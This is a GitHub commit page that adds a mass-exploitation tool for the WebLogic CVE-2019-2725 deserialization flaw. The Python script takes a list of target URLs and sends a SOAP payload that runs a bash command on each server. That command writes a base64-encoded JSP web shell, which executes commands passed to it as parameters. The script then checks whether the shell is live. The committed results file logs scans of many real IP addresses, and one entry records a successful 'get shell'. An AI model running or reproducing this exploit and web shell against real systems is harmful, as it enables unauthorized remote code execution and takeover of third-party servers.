Skip to content
Permalink
Browse files

CVE-2019-2725

  • Loading branch information...
No4l committed Apr 28, 2019
1 parent d2961f7 commit 9943385596143ac9e906354a7c1b42b5570e669f
Showing with 127 additions and 0 deletions.
  1. +1 −0 CVE-2019-2725/domain.txt
  2. +116 −0 CVE-2019-2725/main.py
  3. +7 −0 CVE-2019-2725/readme.md
  4. +1 −0 CVE-2019-2725/result.csv
  5. +2 −0 readme.txt
@@ -0,0 +1 @@
http://www.baidu.com
@@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
from time import sleep
import threading
import requests
import sys

##存在漏洞的路径,如果存在该路径则很大可能存在漏洞
Path = '/_async/AsyncResponseService'
WebSehll = '/_async/webshells.jsp'

##Payload
Headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0',
'Content-Type': 'text/xml'
}

Data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>'''


def printInfo():
print('Usage: Python main.py filename')

def urlHeadle(url):
if url.find('http')==0:
return url.strip()
else:
return 'http://'+url.strip()

def start(file):
urls = []
with open(file) as f:
for i in f.readlines():
urls.append(urlHeadle(i))
threads = []
for i in urls:
t = threading.Thread(target=run,args=(i,))
threads.append(t)

for t in threads:
t.setDaemon(True)
t.start()
sleep(0.5)

t.join()

def run(url):
try:
res = requests.get(url+Path,timeout=1)
status = res.status_code
except:
status = 'XXX'

if status != 200:
message = '[-]'+url+' may be not available,response code: '+str(status)
print(message)
else:
try:
res = requests.post(url+Path,data=Data,headers=Headers,timeout=1)
except:
status = 'XXX'
message = 'put webshell error'
if status == 'XXX':
print('[-]'+url,message)
else:
try:
res = requests.get(url+WebSehll,timeout=1)
status = res.status_code
except:
status = 'XXX'
message = 'connect error'
if status == 200:
message = 'congratulations get shell'
print('[+]'+url,message)
else:
print('[-]'+url,message)
with open('result.csv','a') as wf:
wf.write(url+','+message+','+str(status))





if __name__ == '__main__':
try:
file = sys.argv[1]
except:
printInfo()
exit()

start(file)


# requests.post(i.strip()+Path,data=Data,headers=Headers)
@@ -0,0 +1,7 @@
### CVE-2019-2725
Weblogic wls9_async_response 反序列化RCE
```cmd
usage:
python main.py domain.txt
```
结果保存在result.csv中
@@ -0,0 +1 @@
http://47.106.125.183:7001,congratulations get shell,200http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.29:8443,[-]http://211.140.178.29:8443 may be not available,response code: 404,404http://211.140.178.34:8443,[-]http://211.140.178.34:8443 may be not available,response code: 404,404http://211.140.178.41:8443,[-]http://211.140.178.41:8443 may be not available,response code: 404,404http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.47:8443,[-]http://211.140.178.47:8443 may be not available,response code: 404,404http://211.140.178.48:8443,[-]http://211.140.178.48:8443 may be not available,response code: 404,404http://211.140.178.52:8443,[-]http://211.140.178.52:8443 may be not available,response code: 404,404http://211.140.178.58:8443,[-]http://211.140.178.58:8443 may be not available,response code: 404,404http://211.140.178.6:8443,[-]http://211.140.178.6:8443 may be not available,response code: 404,404http://211.140.178.60:8443,[-]http://211.140.178.60:8443 may be not available,response code: 404,404http://211.140.178.61:8443,[-]http://211.140.178.61:8443 may be not available,response code: 404,404http://211.140.178.64:8443,[-]http://211.140.178.64:8443 may be not available,response code: 404,404http://211.140.178.67:8443,[-]http://211.140.178.67:8443 may be not available,response code: 404,404http://211.140.178.74:8443,[-]http://211.140.178.74:8443 may be not available,response code: 404,404http://211.140.179.101:8443,[-]http://211.140.179.101:8443 may be not available,response code: 404,404http://211.140.179.117:8443,[-]http://211.140.179.117:8443 may be not available,response code: 404,404http://211.140.179.12:8443,[-]http://211.140.179.12:8443 may be not available,response code: 404,404http://211.140.179.120:8443,[-]http://211.140.179.120:8443 may be not available,response code: 404,404http://211.140.179.124:8443,[-]http://211.140.179.124:8443 may be not available,response code: 404,404http://211.140.179.129:8443,[-]http://211.140.179.129:8443 may be not available,response code: 404,404http://211.140.179.140:8443,[-]http://211.140.179.140:8443 may be not available,response code: 404,404http://211.140.179.141:8443,[-]http://211.140.179.141:8443 may be not available,response code: 404,404http://211.140.179.145:8443,[-]http://211.140.179.145:8443 may be not available,response code: 404,404http://211.140.179.147:8443,[-]http://211.140.179.147:8443 may be not available,response code: 404,404http://211.140.179.153:8443,[-]http://211.140.179.153:8443 may be not available,response code: 404,404http://211.140.179.160:8443,[-]http://211.140.179.160:8443 may be not available,response code: 404,404http://211.140.179.177:8443,[-]http://211.140.179.177:8443 may be not available,response code: 404,404http://211.140.179.187:8443,[-]http://211.140.179.187:8443 may be not available,response code: 404,404http://211.140.179.189:8443,[-]http://211.140.179.189:8443 may be not available,response code: 404,404http://211.140.179.19:8443,[-]http://211.140.179.19:8443 may be not available,response code: 404,404http://211.140.179.191:8443,[-]http://211.140.179.191:8443 may be not available,response code: 404,404http://211.140.179.192:8443,[-]http://211.140.179.192:8443 may be not available,response code: 404,404http://211.140.179.199:8443,[-]http://211.140.179.199:8443 may be not available,response code: 404,404http://211.140.179.203:8443,[-]http://211.140.179.203:8443 may be not available,response code: 404,404http://211.140.179.205:8443,[-]http://211.140.179.205:8443 may be not available,response code: 404,404http://211.140.179.206:8443,[-]http://211.140.179.206:8443 may be not available,response code: 404,404http://59.16.120.55:7001,[-]http://59.16.120.55:7001 may be not available,response code: XXX,XXX
@@ -20,3 +20,5 @@ CNVD:
指纹识别,add error json
2019/4/27
Web Title
2019/4/28
CVE-2019-2725

0 comments on commit 9943385

Please sign in to comment.
You can’t perform that action at this time.